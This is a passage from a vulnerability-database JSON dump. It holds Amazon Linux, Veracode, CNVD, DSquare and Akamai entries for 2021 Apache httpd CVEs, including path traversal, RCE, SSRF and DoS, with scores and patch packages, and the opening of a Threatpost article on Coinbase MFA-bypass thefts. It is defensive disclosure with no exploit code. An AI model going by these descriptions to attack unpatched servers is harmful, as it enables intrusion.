(CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd24-manual-2.4.51-1.94.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193>), [CVE-2021-34798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798>), [CVE-2021-36160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160>), [CVE-2021-39275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275>), [CVE-2021-40438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438>), [CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>), [CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>), [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:52:00", "type": "amazon", "title": "Important: httpd24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:02:00", "id": "ALAS-2021-1543", "href": "https://alas.aws.amazon.com/ALAS-2021-1543.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-01T21:44:10", "description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd-manual-2.4.51-1.amzn2.noarch \n \u00a0\u00a0\u00a0 httpd-filesystem-2.4.51-1.amzn2.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.src \n \n x86_64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193>), [CVE-2021-34798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798>), [CVE-2021-36160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160>), [CVE-2021-39275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275>), [CVE-2021-40438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438>), [CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>), [CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>), [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:57:00", "type": "amazon", "title": "Important: httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:04:00", "id": "ALAS2-2021-1716", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-08-16T19:40:32", "description": "apache2 is vulnerable to denial of service. The vulnerability exists due to a null pointer dereference during HTTP/2 request processing.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T09:50:40", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-08-15T14:28:58", "id": "VERACODE:32398", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32398/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-16T19:28:11", "description": "Apache HTTP Server is vulnerable to path traversal attacks. An attacker could use a path traversal attack to map URLs to the files outside of the document root are not protected by the \u201crequire all denied\u201d directive in the Apache configuration file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T21:08:53", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-15T14:29:33", "id": "VERACODE:32442", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32442/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T19:43:42", "description": "apache2 has path traversal. The vulnerability exists due to a flaw found in a change made to path normalization.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T07:50:10", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-15T14:30:34", "id": "VERACODE:32397", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32397/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T06:53:48", "description": "Apache HTTP Server is an open source web server from the Apache Foundation. The server is fast, reliable, and extensible via a simple API.A denial-of-service vulnerability exists in Apache HTTP Server version 2.4.49, which stems from the detection of a new null pointer dereference during HTTP/2 request processing, allowing a denial-of-service attack on the server by an external source. No detailed vulnerability details are currently available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-10T00:00:00", "type": "cnvd", "title": "Apache HTTP Server Denial of Service Vulnerability (CNVD-2022-09237)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-02-10T00:00:00", "id": "CNVD-2022-09237", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-09237", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-11-05T07:11:41", "description": "Apache HTTP Server is an open source web server from the Apache Foundation. Apache HTTP Server version 2.4.49 has a path traversal vulnerability, which originates from the ap_normalize_path function introduced without strict checksum, and can be exploited by attackers to obtain sensitive information or take control of the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T00:00:00", "type": "cnvd", "title": "Apache HTTP Server path traversal vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-01-13T00:00:00", "id": "CNVD-2022-03222", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-03222", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "Remote Code Execution in Apache\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-07-16T00:00:00", "id": "E-738", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:32", "description": "Path traversal vulnerability in Apache\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "E-739", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-11-01T16:05:32", "description": "On September 29, Ash Daulton, along with the cPanel Security Team, reported a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.29 to the Apache security team. The issue was fixed within two days, under CVE-2021-41773, and the patch was released on October 4. Apache urged to deploy the fix, as it is already being actively exploited.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T20:15:00", "type": "akamaiblog", "title": "Mitigating CVE-2021-41773: Apache HTTP Server Path Traversal", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-07T20:15:00", "id": "AKAMAIBLOG:72129348AFF386C88DD2D4145C64F678", "href": "https://www.akamai.com/blog/news/how-akamai-helps-you-protect-against-0-days", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-10-05T20:16:21", "description": "The accounts of at least 6,000 Coinbase customers were robbed of funds after attackers bypassed the cryptocurrency exchange\u2019s multi-factor authentication (MFA).\n\nAccording to a notification letter ([PDF](<https://s3.documentcloud.org/documents/21073975/09-24-2021-coinbase-customer-notification.pdf>)) \u2013 seen and posted by [BleepingComputer, ](<https://www.bleepingcomputer.com/news/security/hackers-rob-thousands-of-coinbase-customers-using-mfa-flaw/>)which first reported the story \u2013 that Coinbase sent to affected customers and filed with the California state Attorney General\u2019s office, the theft happened between March and May 20, 2021.\n\nThe attacker(s) used a flaw in Coinbase\u2019s account recovery process to seize the SMS two-factor authentication tokens needed to break into customers\u2019 accounts and transfer funds to crypto wallets unassociated with Coinbase.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn order to pull it off, the culprits first needed access to victims\u2019 email addresses, passwords, phone numbers and personal email inboxes. Coinbase doesn\u2019t know exactly how the third parties gained access to all that, but the exchange doesn\u2019t think it\u2019s to blame: \u201cWe have not found any evidence that these third parties obtained this information from Coinbase itself,\u201d according to the exchange\u2019s breach notification.\n\nCoinbase noted that such information is often gleaned through phishing attacks or other social engineering techniques that trick victims into disclosing their login credentials.\n\n## Coinbase Phishing Attacks Are Rising\n\nIn fact, earlier this week, on Monday, Coinbase warned that [phishing attacks are on the rise](<https://blog.coinbase.com/phishing-attacks-are-on-the-rise-here-are-some-steps-you-can-take-to-protect-yourself-872833c7671b>), both in terms of volume and success rates. Between April and early May 2021, its security team saw a \u201csignificant uptick\u201d in Coinbase-branded phishing messages that targeted users of a range of commonly used email service providers: attacks that \u201cdemonstrated a higher degree of success\u201d at bypassing spam filters of certain older email services.\n\nCoinbase provided samples of the phishing attacks its team has seen, including the ones shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01150844/locked-account-phishing-email-e1633115339529.png>)\n\n\u201cLocked account\u201d phishing email, designed to alarm the recipient into clicking without taking the time to verify other aspects of the message. \nSource: Coinbase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01151129/Hotmail-phish-e1633115503310.png>)\n\nFor some victims with Hotmail accounts, attackers attempted to add a malicious application to the user\u2019s inbox. If the recipient clicked \u201cYes,\u201d an attacker would be able to read all the user\u2019s emails (including password reset and device verification emails sent by Coinbase). Source: Coinbase.\n\nClearly, cryptocurrency thieves are nothing if not creative, and understandably so: They\u2019re going after a lucrative, juicy target. While they\u2019re considered a secure place for users to store their cryptocurrency assets, [researchers in 2018 proved](<https://threatpost.com/cryptocurrency-wallet-hacks-spark-dustup/140445/>) that wallets such as Ledger and Trezor are vulnerable to a number of cyber 